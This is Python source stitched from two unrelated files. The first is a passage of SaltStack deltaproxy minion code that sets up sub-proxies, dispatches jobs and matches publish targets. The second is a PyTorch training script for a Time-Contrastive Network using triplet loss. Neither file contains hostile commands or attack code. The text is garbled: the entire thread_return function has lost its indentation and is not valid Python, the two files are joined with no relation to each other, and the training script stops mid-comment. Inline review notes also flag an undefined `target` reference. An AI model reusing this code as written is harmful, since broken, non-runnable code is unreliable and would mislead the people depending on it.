        )
        self.schedule.delete_job(
            salt.minion.master_event(type="failback"), persist=True
        )

    # proxy keepalive
    proxy_alive_fn = fq_proxyname + ".alive"
    if (
        proxy_alive_fn in self.proxy
        and "status.proxy_reconnect" in self.functions
        and self.opts.get("proxy_keep_alive", True)
    ):
        # if `proxy_keep_alive` is either not specified, either set to False does not retry reconnecting
        self.schedule.add_job(
            {
                "__proxy_keepalive": {
                    "function": "status.proxy_reconnect",
                    "minutes": self.opts.get(
                        "proxy_keep_alive_interval", 1
                    ),  # by default, check once per minute
                    "jid_include": True,
                    "maxrunning": 1,
                    "return_job": False,
                    "kwargs": {"proxy_name": fq_proxyname},
                }
            },
            persist=True,
        )
        self.schedule.enable_schedule()
    else:
        self.schedule.delete_job("__proxy_keepalive", persist=True)

    # Sync the grains here so the proxy can communicate them to the master
    self.functions["saltutil.sync_grains"](saltenv="base")
    self.grains_cache = self.opts["grains"]

    # Now setup the deltaproxies
    self.deltaproxy = {}
    self.deltaproxy_opts = {}
    self.deltaproxy_objs = {}
    self.proxy_grains = {}
    self.proxy_pillar = {}
    self.proxy_context = {}
    self.add_periodic_callback("cleanup", self.cleanup_subprocesses)

    # One sub-ProxyMinion per configured id; each gets its own opts, grains,
    # pillar, loader context, and schedule, mirroring the setup done above
    # for the control proxy.
    for _id in self.opts["proxy"].get("ids", []):
        control_id = self.opts["id"]
        proxyopts = self.opts.copy()
        proxyopts["id"] = _id

        proxyopts = salt.config.proxy_config(
            self.opts["conf_file"], defaults=proxyopts, minion_id=_id
        )
        proxyopts["id"] = proxyopts["proxyid"] = _id

        proxyopts["subproxy"] = True

        self.proxy_context[_id] = {"proxy_id": _id}

        # We need grains first to be able to load pillar, which is where we keep the proxy
        # configurations
        self.proxy_grains[_id] = salt.loader.grains(
            proxyopts, proxy=self.proxy, context=self.proxy_context[_id]
        )
        self.proxy_pillar[_id] = yield salt.pillar.get_async_pillar(
            proxyopts,
            self.proxy_grains[_id],
            _id,
            saltenv=proxyopts["saltenv"],
            pillarenv=proxyopts.get("pillarenv"),
        ).compile_pillar()

        proxyopts["proxy"] = self.proxy_pillar[_id].get("proxy", {})

        # Remove ids
        proxyopts["proxy"].pop("ids", None)

        proxyopts["pillar"] = self.proxy_pillar[_id]
        proxyopts["grains"] = self.proxy_grains[_id]

        proxyopts["hash_id"] = self.opts["id"]

        _proxy_minion = ProxyMinion(proxyopts)
        _proxy_minion.proc_dir = salt.minion.get_proc_dir(
            proxyopts["cachedir"], uid=uid
        )

        _proxy_minion.proxy = salt.loader.proxy(
            proxyopts, utils=self.utils, context=self.proxy_context[_id]
        )
        _proxy_minion.subprocess_list = self.subprocess_list

        # And load the modules
        (
            _proxy_minion.functions,
            _proxy_minion.returners,
            _proxy_minion.function_errors,
            _proxy_minion.executors,
        ) = _proxy_minion._load_modules(
            opts=proxyopts, grains=proxyopts["grains"], context=self.proxy_context[_id]
        )

        # we can then sync any proxymodules down from the master
        # we do a sync_all here in case proxy code was installed by
        # SPM or was manually placed in /srv/salt/_modules etc.
        _proxy_minion.functions["saltutil.sync_all"](saltenv=self.opts["saltenv"])

        # And re-load the modules so the __proxy__ variable gets injected
        (
            _proxy_minion.functions,
            _proxy_minion.returners,
            _proxy_minion.function_errors,
            _proxy_minion.executors,
        ) = _proxy_minion._load_modules(
            opts=proxyopts, grains=proxyopts["grains"], context=self.proxy_context[_id]
        )
        _proxy_minion.functions.pack["__proxy__"] = _proxy_minion.proxy
        _proxy_minion.proxy.pack["__salt__"] = _proxy_minion.functions
        _proxy_minion.proxy.pack["__ret__"] = _proxy_minion.returners
        _proxy_minion.proxy.pack["__pillar__"] = proxyopts["pillar"]
        _proxy_minion.proxy.pack["__grains__"] = proxyopts["grains"]

        # Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__
        _proxy_minion.proxy.utils = salt.loader.utils(
            proxyopts, proxy=_proxy_minion.proxy, context=self.proxy_context[_id]
        )
        _proxy_minion.proxy.pack["__utils__"] = _proxy_minion.proxy.utils

        # Reload all modules so all dunder variables are injected
        _proxy_minion.proxy.reload_modules()

        _proxy_minion.connected = True

        _fq_proxyname = proxyopts["proxy"]["proxytype"]

        proxy_init_fn = _proxy_minion.proxy[_fq_proxyname + ".init"]
        proxy_init_fn(proxyopts)

        # Reload the grains
        self.proxy_grains[_id] = salt.loader.grains(
            proxyopts, proxy=_proxy_minion.proxy, context=self.proxy_context[_id]
        )
        proxyopts["grains"] = self.proxy_grains[_id]

        if not hasattr(_proxy_minion, "schedule"):
            _proxy_minion.schedule = salt.utils.schedule.Schedule(
                proxyopts,
                _proxy_minion.functions,
                _proxy_minion.returners,
                cleanup=[salt.minion.master_event(type="alive")],
                proxy=_proxy_minion.proxy,
                new_instance=True,
                _subprocess_list=_proxy_minion.subprocess_list,
            )

        self.deltaproxy_objs[_id] = _proxy_minion
        self.deltaproxy_opts[_id] = copy.deepcopy(proxyopts)

        # proxy keepalive
        _proxy_alive_fn = _fq_proxyname + ".alive"
        if (
            _proxy_alive_fn in _proxy_minion.proxy
            and "status.proxy_reconnect" in self.deltaproxy_objs[_id].functions
            and proxyopts.get("proxy_keep_alive", True)
        ):
            # if `proxy_keep_alive` is either not specified, either set to False does not retry reconnecting
            _proxy_minion.schedule.add_job(
                {
                    "__proxy_keepalive": {
                        "function": "status.proxy_reconnect",
                        "minutes": proxyopts.get(
                            "proxy_keep_alive_interval", 1
                        ),  # by default, check once per minute
                        "jid_include": True,
                        "maxrunning": 1,
                        "return_job": False,
                        "kwargs": {"proxy_name": _fq_proxyname},
                    }
                },
                persist=True,
            )
            _proxy_minion.schedule.enable_schedule()
        else:
            _proxy_minion.schedule.delete_job("__proxy_keepalive", persist=True)

    self.ready = True
def target(cls, minion_instance, opts, data, connected):
    """Dispatch a job payload to the proper thread-return handler.

    Lazily provisions *minion_instance*'s serializer and proc dir, then runs
    the job inside the minion's stack context; a tuple/list ``fun`` means a
    multi-function job.
    """
    log.debug(
        "Deltaproxy minion_instance %s(ID: %s). Target: %s",
        minion_instance,
        minion_instance.opts["id"],
        opts["id"],
    )

    if not hasattr(minion_instance, "serial"):
        minion_instance.serial = salt.payload.Serial(opts)
    if not hasattr(minion_instance, "proc_dir"):
        run_uid = salt.utils.user.get_uid(user=opts.get("user", None))
        minion_instance.proc_dir = salt.minion.get_proc_dir(opts["cachedir"], uid=run_uid)

    with tornado.stack_context.StackContext(minion_instance.ctx):
        handler = (
            ProxyMinion._thread_multi_return
            if isinstance(data["fun"], (tuple, list))
            else ProxyMinion._thread_return
        )
        handler(minion_instance, opts, data)
def thread_return(cls, minion_instance, opts, data):
"""
This method should be used as a threading target, start the actual
minion side execution.
"""
fn_ = os.path.join(minion_instance.proc_dir, data["jid"])
if opts["multiprocessing"] and not salt.utils.platform.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.process.appendproctitle(
"{}._thread_return {}".format(cls.__name__, data["jid"])
)
sdata = {"pid": os.getpid()}
sdata.update(data)
log.info("Starting a new job with PID %s", sdata["pid"])
with salt.utils.files.fopen(fn_, "w+b") as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {"success": False}
function_name = data["fun"]
executors = (
data.get("module_executors")
or getattr(minion_instance, "module_executors", [])
or opts.get("module_executors", ["direct_call"])
)
allow_missing_funcs = any(
[
minion_instance.executors["{}.allow_missing_func".format(executor)](
function_name
)
for executor in executors
if "{}.allow_missing_func".format(executor) in minion_instance.executors
]
)
if function_name in minion_instance.functions or allow_missing_funcs is True:
try:
minion_blackout_violation = False
if minion_instance.connected and minion_instance.opts["pillar"].get(
"minion_blackout", False
):
whitelist = minion_instance.opts["pillar"].get(
"minion_blackout_whitelist", []
)
# this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
if (
function_name != "saltutil.refresh_pillar"
and function_name not in whitelist
):
minion_blackout_violation = True
# use minion_blackout_whitelist from grains if it exists
if minion_instance.opts["grains"].get("minion_blackout", False):
whitelist = minion_instance.opts["grains"].get(
"minion_blackout_whitelist", []
)
if (
function_name != "saltutil.refresh_pillar"
and function_name not in whitelist
):
minion_blackout_violation = True
if minion_blackout_violation:
raise SaltInvocationError(
'Minion in blackout mode. Set "minion_blackout" '
"to False in pillar or grains to resume operations. Only "
"saltutil.refresh_pillar allowed in blackout mode."
)
if function_name in minion_instance.functions:
func = minion_instance.functions[function_name]
args, kwargs = salt.minion.load_args_and_kwargs(func, data["arg"], data)
else:
# only run if function_name is not in minion_instance.functions and allow_missing_funcs is True
func = function_name
args, kwargs = data["arg"], data
minion_instance.functions.pack["__context__"]["retcode"] = 0
minion_instance.functions.pack["__opts__"] = opts
if isinstance(executors, str):
executors = [executors]
elif not isinstance(executors, list) or not executors:
raise SaltInvocationError(
"Wrong executors specification: {}. String or non-empty list expected".format(
executors
)
)
if opts.get("sudo_user", "") and executors[-1] != "sudo":
executors[-1] = "sudo" # replace the last one with sudo
log.debug("Executors list %s", executors)
for name in executors:
fname = "{}.execute".format(name)
if fname not in minion_instance.executors:
raise SaltInvocationError(
"Executor '{}' is not available".format(name)
)
return_data = minion_instance.executors[fname](
opts, data, func, args, kwargs
)
if return_data is not None:
break
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data["jid"], "prog", opts["id"], str(ind)], "job")
event_data = {"return": single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret["return"] = iret
else:
ret["return"] = return_data
retcode = minion_instance.functions.pack["__context__"].get(
"retcode", salt.defaults.exitcodes.EX_OK
)
if retcode == salt.defaults.exitcodes.EX_OK:
# No nonzero retcode in __context__ dunder. Check if return
# is a dictionary with a "result" or "success" key.
try:
func_result = all(
return_data.get(x, True) for x in ("result", "success")
)
except Exception: # pylint: disable=broad-except
# return data is not a dict
func_result = True
if not func_result:
retcode = salt.defaults.exitcodes.EX_GENERIC
ret["retcode"] = retcode
ret["success"] = retcode == salt.defaults.exitcodes.EX_OK
except CommandNotFoundError as exc:
msg = 'Command required for "{}" not found'.format(function_name)
log.debug(msg, exc_info=True)
ret["return"] = "{}: {}".format(msg, exc)
ret["out"] = "nested"
ret["retcode"] = salt.defaults.exitcodes.EX_GENERIC
except CommandExecutionError as exc:
log.error(
'A command in "%s" had a problem: %s',
function_name,
exc,
exc_info_on_loglevel=logging.DEBUG,
)
ret["return"] = "ERROR: {}".format(exc)
ret["out"] = "nested"
ret["retcode"] = salt.defaults.exitcodes.EX_GENERIC
except SaltInvocationError as exc:
log.error(
'Problem executing "%s": %s',
function_name,
exc,
exc_info_on_loglevel=logging.DEBUG,
)
ret["return"] = 'ERROR executing "{}": {}'.format(function_name, exc)
ret["out"] = "nested"
ret["retcode"] = salt.defaults.exitcodes.EX_GENERIC
except TypeError as exc:
msg = "Passed invalid arguments to {}: {}\n{}".format(
function_name, exc, func.__doc__ or ""
)
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret["return"] = msg
ret["out"] = "nested"
ret["retcode"] = salt.defaults.exitcodes.EX_GENERIC
except Exception: # pylint: disable=broad-except
msg = "The minion function caused an exception"
log.warning(msg, exc_info=True)
salt.utils.error.fire_exception(
salt.exceptions.MinionError(msg), opts, job=data
)
ret["return"] = "{}: {}".format(msg, traceback.format_exc())
ret["out"] = "nested"
ret["retcode"] = salt.defaults.exitcodes.EX_GENERIC
else:
docs = minion_instance.functions["sys.doc"]("{}*".format(function_name))
if docs:
docs[function_name] = minion_instance.functions.missing_fun_string(
function_name
)
ret["return"] = docs
else:
ret["return"] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split(".")[0]
if mod_name in minion_instance.function_errors:
ret["return"] += ' Possible reasons: "{}"'.format(
minion_instance.function_errors[mod_name]
)
ret["success"] = False
ret["retcode"] = salt.defaults.exitcodes.EX_GENERIC
ret["out"] = "nested"
ret["jid"] = data["jid"]
ret["fun"] = data["fun"]
ret["fun_args"] = data["arg"]
if "master_id" in data:
ret["master_id"] = data["master_id"]
if "metadata" in data:
if isinstance(data["metadata"], dict):
ret["metadata"] = data["metadata"]
else:
log.warning("The metadata parameter must be a dictionary. Ignoring.")
if minion_instance.connected:
minion_instance._return_pub(ret, timeout=minion_instance._return_retry_timer())
# Add default returners from minion config
# Should have been coverted to comma-delimited string already
if isinstance(opts.get("return"), str):
if data["ret"]:
data["ret"] = ",".join((data["ret"], opts["return"]))
else:
data["ret"] = opts["return"]
# TODO: make a list? Seems odd to split it this late :/
if data["ret"] and isinstance(data["ret"], str):
if "ret_config" in data:
ret["ret_config"] = data["ret_config"]
if "ret_kwargs" in data:
ret["ret_kwargs"] = data["ret_kwargs"]
ret["id"] = opts["id"]
for returner in set(data["ret"].split(",")):
try:
returner_str = "{}.returner".format(returner)
if returner_str in minion_instance.returners:
minion_instance.returners[returner_str](ret)
else:
returner_err = minion_instance.returners.missing_fun_string(
returner_str
)
log.error(
"Returner %s could not be loaded: %s",
returner_str,
returner_err,
)
except Exception as exc: # pylint: disable=broad-except
log.exception("The return failed for job %s: %s", data["jid"], exc)
def thread_multi_return(cls, minion_instance, opts, data):
    """
    This method should be used as a threading target, start the actual
    minion side execution.

    Runs every function in the multi-function job ``data["fun"]`` in
    order, collecting per-function return/retcode/success into ``ret``,
    then publishes the result to the master and any extra returners.
    """
    # Per-job marker file under the minion proc dir, keyed by jid.
    fn_ = os.path.join(minion_instance.proc_dir, data["jid"])
    if opts["multiprocessing"] and not salt.utils.platform.is_windows():
        # Shutdown the multiprocessing before daemonizing
        salt.log.setup.shutdown_multiprocessing_logging()
        salt.utils.process.daemonize_if(opts)
        # Reconfigure multiprocessing logging after daemonizing
        salt.log.setup.setup_multiprocessing_logging()
    # Make the jid visible in the process title for ps/debugging.
    salt.utils.process.appendproctitle(
        "{}._thread_multi_return {}".format(cls.__name__, data["jid"])
    )
    sdata = {"pid": os.getpid()}
    sdata.update(data)
    log.info("Starting a new job with PID %s", sdata["pid"])
    with salt.utils.files.fopen(fn_, "w+b") as fp_:
        fp_.write(minion_instance.serial.dumps(sdata))
    multifunc_ordered = opts.get("multifunc_ordered", False)
    num_funcs = len(data["fun"])
    if multifunc_ordered:
        # Ordered mode: results are positional lists keyed by index.
        ret = {
            "return": [None] * num_funcs,
            "retcode": [None] * num_funcs,
            "success": [False] * num_funcs,
        }
    else:
        # Unordered mode: results are dicts keyed by function name.
        ret = {"return": {}, "retcode": {}, "success": {}}
    for ind in range(0, num_funcs):
        if not multifunc_ordered:
            ret["success"][data["fun"][ind]] = False
        try:
            minion_blackout_violation = False
            if minion_instance.connected and minion_instance.opts["pillar"].get(
                "minion_blackout", False
            ):
                whitelist = minion_instance.opts["pillar"].get(
                    "minion_blackout_whitelist", []
                )
                # this minion is blacked out. Only allow saltutil.refresh_pillar and the whitelist
                if (
                    data["fun"][ind] != "saltutil.refresh_pillar"
                    and data["fun"][ind] not in whitelist
                ):
                    minion_blackout_violation = True
            elif minion_instance.opts["grains"].get("minion_blackout", False):
                # use minion_blackout_whitelist from grains if it exists
                whitelist = minion_instance.opts["grains"].get(
                    "minion_blackout_whitelist", []
                )
                if (
                    data["fun"][ind] != "saltutil.refresh_pillar"
                    and data["fun"][ind] not in whitelist
                ):
                    minion_blackout_violation = True
            if minion_blackout_violation:
                raise SaltInvocationError(
                    'Minion in blackout mode. Set "minion_blackout" '
                    "to False in pillar or grains to resume operations. Only "
                    "saltutil.refresh_pillar allowed in blackout mode."
                )
            func = minion_instance.functions[data["fun"][ind]]
            args, kwargs = salt.minion.load_args_and_kwargs(
                func, data["arg"][ind], data
            )
            # Reset retcode so a previous function's value can't leak in.
            minion_instance.functions.pack["__context__"]["retcode"] = 0
            key = ind if multifunc_ordered else data["fun"][ind]
            ret["return"][key] = func(*args, **kwargs)
            retcode = minion_instance.functions.pack["__context__"].get("retcode", 0)
            if retcode == 0:
                # No nonzero retcode in __context__ dunder. Check if return
                # is a dictionary with a "result" or "success" key.
                try:
                    func_result = all(
                        ret["return"][key].get(x, True) for x in ("result", "success")
                    )
                except Exception:  # pylint: disable=broad-except
                    # return data is not a dict
                    func_result = True
                if not func_result:
                    retcode = 1
            ret["retcode"][key] = retcode
            ret["success"][key] = retcode == 0
        except Exception as exc:  # pylint: disable=broad-except
            # A failing function records its traceback but does not stop
            # the remaining functions in the job.
            trb = traceback.format_exc()
            log.warning("The minion function caused an exception: %s", exc)
            if multifunc_ordered:
                ret["return"][ind] = trb
            else:
                ret["return"][data["fun"][ind]] = trb
    ret["jid"] = data["jid"]
    ret["fun"] = data["fun"]
    ret["fun_args"] = data["arg"]
    if "metadata" in data:
        ret["metadata"] = data["metadata"]
    if minion_instance.connected:
        minion_instance._return_pub(ret, timeout=minion_instance._return_retry_timer())
    if data["ret"]:
        if "ret_config" in data:
            ret["ret_config"] = data["ret_config"]
        if "ret_kwargs" in data:
            ret["ret_kwargs"] = data["ret_kwargs"]
        # data["ret"] is a comma-delimited list of extra returners.
        for returner in set(data["ret"].split(",")):
            ret["id"] = opts["id"]
            try:
                minion_instance.returners["{}.returner".format(returner)](ret)
            except Exception as exc:  # pylint: disable=broad-except
                log.error("The return failed for job %s: %s", data["jid"], exc)
def handle_payload(self, payload):
    """
    Dispatch a decoded publish payload to the control proxy and to every
    sub-proxy whose target matcher accepts the load.

    Only AES-encrypted (i.e. verified) payloads are executed.
    """
    if payload is not None and payload["enc"] == "aes":
        # First handle payload for the "control" proxy
        if self._target_load(payload["load"]):
            self._handle_decoded_payload(payload["load"])
        # The following handles the sub-proxies
        sub_ids = self.opts["proxy"].get("ids", [self.opts["id"]])
        for _id in sub_ids:
            instance = self.deltaproxy_objs[_id]
            if instance._target_load(payload["load"]):
                instance._handle_decoded_payload(payload["load"])
    elif self.opts["zmq_filtering"]:
        # In the filtering enabled case, we"d like to know when minion sees something it shouldnt
        log.trace(
            "Broadcast message received not for this minion, Load: %s", payload["load"]
        )
    # If it"s not AES, and thus has not been verified, we do nothing.
    # In the future, we could add support for some clearfuncs, but
    # the minion currently has no need.
def handle_decoded_payload(self, data):
    """
    Override this method if you wish to handle the decoded data
    differently.

    De-duplicates jobs via ``self.jid_queue``, optionally throttles on
    ``process_count_max`` (this body uses ``yield tornado.gen.sleep`` —
    presumably run as a tornado coroutine; confirm the decorator outside
    this view), then launches the job in a process or thread.
    """
    if "user" in data:
        log.info(
            "User %s Executing command %s with jid %s",
            data["user"],
            data["fun"],
            data["jid"],
        )
    else:
        log.info("Executing command %s with jid %s", data["fun"], data["jid"])
    log.debug("Command details %s", data)
    # Don"t duplicate jobs
    log.trace("Started JIDs: %s", self.jid_queue)
    if self.jid_queue is not None:
        if data["jid"] in self.jid_queue:
            # Already seen this jid — drop the duplicate publish.
            return
        else:
            self.jid_queue.append(data["jid"])
            # Bounded queue: drop the oldest jid past the high-water mark.
            if len(self.jid_queue) > self.opts["minion_jid_queue_hwm"]:
                self.jid_queue.pop(0)
    if isinstance(data["fun"], str):
        if data["fun"] == "sys.reload_modules":
            # Reload execution/returner/executor modules in-place and
            # keep the scheduler's references in sync.
            (
                self.functions,
                self.returners,
                self.function_errors,
                self.executors,
            ) = self._load_modules()
            self.schedule.functions = self.functions
            self.schedule.returners = self.returners
    process_count_max = self.opts.get("process_count_max")
    if process_count_max > 0:
        # Throttle: wait until the number of running job processes
        # drops below the configured ceiling.
        process_count = self.subprocess_list.count
        once_logged = False
        while process_count >= process_count_max:
            if once_logged is False:
                log.debug(
                    "Maximum number of processes reached while executing jid %s, waiting...",
                    data["jid"],
                )
                once_logged = True
            yield tornado.gen.sleep(0.5)
            process_count = self.subprocess_list.count
    # We stash an instance references to allow for the socket
    # communication in Windows. You can"t pickle functions, and thus
    # python needs to be able to reconstruct the reference on the other
    # side.
    instance = self
    multiprocessing_enabled = self.opts.get("multiprocessing", True)
    if multiprocessing_enabled:
        if sys.platform.startswith("win"):
            # let python reconstruct the minion on the other side if we"re
            # running on windows
            instance = None
        # NOTE(review): `target` is not defined in this visible scope, and
        # `instance.opts` would raise AttributeError when instance is None
        # on Windows — confirm against the enclosing definition.
        process = SignalHandlingProcess(
            target=target, args=(self, instance, instance.opts, data, self.connected)
        )
    else:
        process = threading.Thread(
            target=target,
            args=(self, instance, instance.opts, data, self.connected),
            name=data["jid"],
        )
    process.start()
    process.name = "{}-Job-{}".format(process.name, data["jid"])
    self.subprocess_list.add(process)
def target_load(self, load):
    """
    Return True if the published job ``load`` is valid and targets this
    minion, False otherwise.
    """
    # Verify that the publication is valid
    for key in ("tgt", "jid", "fun", "arg"):
        if key not in load:
            return False
    # Verify that the publication applies to this minion
    # It"s important to note that the master does some pre-processing
    # to determine which minions to send a request to. So for example,
    # a "salt -G "grain_key:grain_val" test.ping" will invoke some
    # pre-processing on the master and this minion should not see the
    # publication if the master does not determine that it should.
    if "tgt_type" in load:
        # Resolve the matcher module for the requested target type.
        match_func = self.matchers.get("{}_match.match".format(load["tgt_type"]), None)
        if match_func is None:
            return False
        if load["tgt_type"] in ("grain", "grain_pcre", "pillar"):
            # These matchers take a key/value delimiter.
            delimiter = load.get("delimiter", DEFAULT_TARGET_DELIM)
            if not match_func(load["tgt"], delimiter=delimiter, opts=self.opts):
                return False
        elif not match_func(load["tgt"], opts=self.opts):
            return False
    else:
        # No explicit target type: fall back to glob matching.
        if not self.matchers["glob_match.match"](load["tgt"], opts=self.opts):
            return False
    return True
# Main Minion Tune In
def tune_in(self, start=True):
    """
    Lock onto the publisher. This is the main event loop for the minion
    :rtype : None
    """
    # Bring every sub-proxy online (scheduler, beacons, initial state
    # run) before entering the shared event loop of the parent class.
    for proxy_id in self.deltaproxy_objs:
        _proxy_minion = self.deltaproxy_objs[proxy_id]
        _proxy_minion.setup_scheduler()
        _proxy_minion.setup_beacons()
        _proxy_minion._state_run()
    super(ProxyMinion, self).tune_in(start=start)
|
train_tcn.py | import os
import argparse
import torch
import numpy as np
from torch import optim
import multiprocessing
from threading import Thread
from queue import Queue
from torch.optim import lr_scheduler
from torch.autograd import Variable
from torch.utils.data import DataLoader, ConcatDataset
from util import (SingleViewTripletBuilder, MultiViewTripletBuilder, distance, Logger, ensure_folder)
from tcn import define_model
IMAGE_SIZE = (299, 299)
def get_args():
    """Parse and return the command-line arguments for TCN training."""
    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument('--start-epoch', type=int, default=1)
    arg_parser.add_argument('--epochs', type=int, default=1000,
                            help='Number of epochs to run the training for')
    arg_parser.add_argument('--save-every', type=int, default=25,
                            help='Number of epochs after which the model gets saved')
    arg_parser.add_argument('--model-folder', type=str, default='./trained_models/tcn/',
                            help='Directory to save the models')
    arg_parser.add_argument('--load-model', type=str, required=False,
                            help='The model to be loaded')
    arg_parser.add_argument('--mode', choices=['single', 'multi'], default='multi',
                            help='Whether to use Single View or Multi View TCN')
    arg_parser.add_argument('--train-directory', type=str, default='./data/train/',
                            help='Directory with the training videos')
    arg_parser.add_argument('--validation-directory', type=str, default='./data/val/',
                            help='Directory with the validation videos')
    # Using a suffix to differentiate the different views, like in the orinigal Tensorflow code.
    arg_parser.add_argument('--train-suffix', type=str, default='_C[.]*.*',
                            help='Suffix to partition training videos based on the different views')
    arg_parser.add_argument('--minibatch-size', type=int, default=32,
                            help='Mini batch size to use for training')
    arg_parser.add_argument('--margin', type=float, default=2.0,
                            help='Margin for the loss function')
    arg_parser.add_argument('--model-name', type=str, default='tcn',
                            help='Name for the model to be saved')
    arg_parser.add_argument('--log-file', type=str, default='./out.log',
                            help='Path to the log file')
    arg_parser.add_argument('--lr-start', type=float, default=0.01,
                            help='Initial learning rate')
    arg_parser.add_argument('--triplets-from-videos', type=int, default=5)
    return arg_parser.parse_args()
arguments = get_args()
logger = Logger(arguments.log_file)
def batch_size(epoch, max_size):
    """Minibatch size for *epoch*: doubles every 100 epochs, starting at
    2 and capped at *max_size*."""
    doubling_steps = epoch // 100
    size = 2 ** doubling_steps
    if size < 2:
        size = 2
    return size if size < max_size else max_size
# Build the fixed validation set once at import time: a triplet builder
# matching the selected TCN mode, sampled 10 times and concatenated.
if arguments.mode == 'single':
    validation_builder = SingleViewTripletBuilder(arguments.validation_directory, IMAGE_SIZE, arguments, sample_size=100)
elif arguments.mode == 'multi':
    validation_builder = MultiViewTripletBuilder(arguments.validation_directory, arguments.train_suffix, 3, IMAGE_SIZE, [], sample_size=100)
logger.info('Building validation sets')
validation_set = [validation_builder.build_set() for i in range(10)]
logger.info('Built validation sets')
logger.info('Concatenating validation sets')
validation_set = ConcatDataset(validation_set)
logger.info('Concatenated validation sets')
# The builder is no longer needed once the set is materialized.
del validation_builder
def validate(tcn, use_cuda, arguments):
    """Score *tcn* on the module-level validation set and log the result.

    Counts triplets where the anchor embedding is closer to the positive
    than to the negative, both with and without the configured margin.
    """
    with torch.no_grad():
        # Run model on validation data and log results
        data_loader = DataLoader(validation_set, batch_size=100, shuffle=False)
        correct_with_margin = 0
        correct_without_margin = 0
        for minibatch, _ in data_loader:
            frames = Variable(minibatch)
            if use_cuda:
                frames = frames.cuda()
            # Triplet layout along dim 1: 0 = anchor, 1 = positive, 2 = negative.
            anchor_frames = frames[:, 0, :, :, :]
            positive_frames = frames[:, 1, :, :, :]
            negative_frames = frames[:, 2, :, :, :]
            anchor_output = tcn(anchor_frames)
            positive_output = tcn(positive_frames)
            negative_output = tcn(negative_frames)
            d_positive = distance(anchor_output, positive_output)
            d_negative = distance(anchor_output, negative_output)
            assert(d_positive.size()[0] == minibatch.size()[0])
            correct_with_margin += ((d_positive + arguments.margin) < d_negative).data.cpu().numpy().sum()
            correct_without_margin += (d_positive < d_negative).data.cpu().numpy().sum()
        message = "Validation score correct with margin {with_margin}/{total} and without margin {without_margin}/{total}".format(
            with_margin=correct_with_margin,
            without_margin=correct_without_margin,
            total=len(validation_set)
        )
        logger.info(message)
def model_filename(model_name, epoch):
    """Build the checkpoint file name for *model_name* at *epoch*."""
    return "{}-epoch-{}.pk".format(model_name, epoch)
def save_model(model, filename, model_folder):
    """Save *model*'s state dict as *filename* inside *model_folder*,
    creating the folder if needed."""
    ensure_folder(model_folder)
    model_path = os.path.join(model_folder, filename)
    torch.save(model.state_dict(), model_path)
def build_set(queue, triplet_builder, log):
    """Worker loop: endlessly build concatenations of 5 triplet sets and
    push them onto *queue* (blocks while the queue is full)."""
    while 1:
        datasets = []
        for i in range(5):
            dataset = triplet_builder.build_set()
            datasets.append(dataset)
        dataset = ConcatDataset(datasets)
        log.info('Created {0} triplets'.format(len(dataset)))
        # Blocks until the training loop consumes the previous dataset.
        queue.put(dataset)
def create_model(use_cuda):
    """Instantiate the TCN, optionally restore weights from
    ``arguments.load_model``, and move it to GPU when *use_cuda*."""
    tcn = define_model(use_cuda)
    # tcn = PosNet()
    if arguments.load_model:
        model_path = os.path.join(
            arguments.model_folder,
            arguments.load_model
        )
        # map_location allows us to load models trained on cuda to cpu.
        tcn.load_state_dict(torch.load(model_path, map_location=lambda storage, loc: storage))
    if use_cuda:
        tcn = tcn.cuda()
    return tcn
def main():
    """Train the TCN with triplet loss.

    A daemon worker thread pre-builds training triplet datasets; the main
    loop consumes them, validates every 10 epochs and checkpoints every
    ``--save-every`` epochs.
    """
    use_cuda = torch.cuda.is_available()
    logger.info('CUDA status: {0}'.format(use_cuda))
    logger.info('Creating TCN Model')
    tcn = create_model(use_cuda)
    if arguments.mode == 'single':
        triplet_builder = SingleViewTripletBuilder(arguments.train_directory, IMAGE_SIZE, arguments, sample_size=100)
    elif arguments.mode == 'multi':
        triplet_builder = MultiViewTripletBuilder(arguments.train_directory, arguments.train_suffix, 3, IMAGE_SIZE, [], sample_size=100)
    # Size-1 queue: the worker pre-builds at most one dataset ahead.
    queue = Queue(1)
    worker = Thread(target=build_set, args=(queue, triplet_builder, logger,))
    # FIX: Thread.setDaemon() is deprecated; assign the daemon attribute.
    worker.daemon = True
    worker.start()
    optimizer = optim.SGD(tcn.parameters(), lr=arguments.lr_start, momentum=0.9)
    # This will diminish the learning rate at the milestones.
    # 0.1, 0.01, 0.001
    learning_rate_scheduler = lr_scheduler.MultiStepLR(optimizer, milestones=[100, 500, 1000], gamma=0.1)
    ITERATE_OVER_TRIPLETS = 5
    for epoch in range(arguments.start_epoch, arguments.start_epoch + arguments.epochs):
        logger.info("Starting epoch: {0} learning rate: {1}".format(
            epoch, learning_rate_scheduler.get_lr()))
        dataset = queue.get()
        logger.info("Got {0} triplets".format(len(dataset)))
        data_loader = DataLoader(
            dataset=dataset,
            batch_size=arguments.minibatch_size,  # batch_size(epoch, arguments.max_minibatch_size),
            shuffle=True
        )
        if epoch % 10 == 0:
            logger.info('Validating after {0} epochs'.format(epoch))
            validate(tcn, use_cuda, arguments)
        for _ in range(0, ITERATE_OVER_TRIPLETS):
            losses = []
            for minibatch, _ in data_loader:
                frames = Variable(minibatch)
                if use_cuda:
                    frames = frames.cuda()
                # Triplet layout along dim 1: 0 = anchor, 1 = positive, 2 = negative.
                anchor_frames = frames[:, 0, :, :, :]
                positive_frames = frames[:, 1, :, :, :]
                negative_frames = frames[:, 2, :, :, :]
                anchor_output = tcn(anchor_frames)
                positive_output = tcn(positive_frames)
                negative_output = tcn(negative_frames)
                d_positive = distance(anchor_output, positive_output)
                d_negative = distance(anchor_output, negative_output)
                # Standard triplet hinge loss with the configured margin.
                loss = torch.clamp(arguments.margin + d_positive - d_negative, min=0.0).mean()
                losses.append(loss.data.cpu().numpy())
                optimizer.zero_grad()
                loss.backward()
                optimizer.step()
            # FIX: the original passed np.mean(losses) as a stray second
            # positional argument to logger.info; format it into the
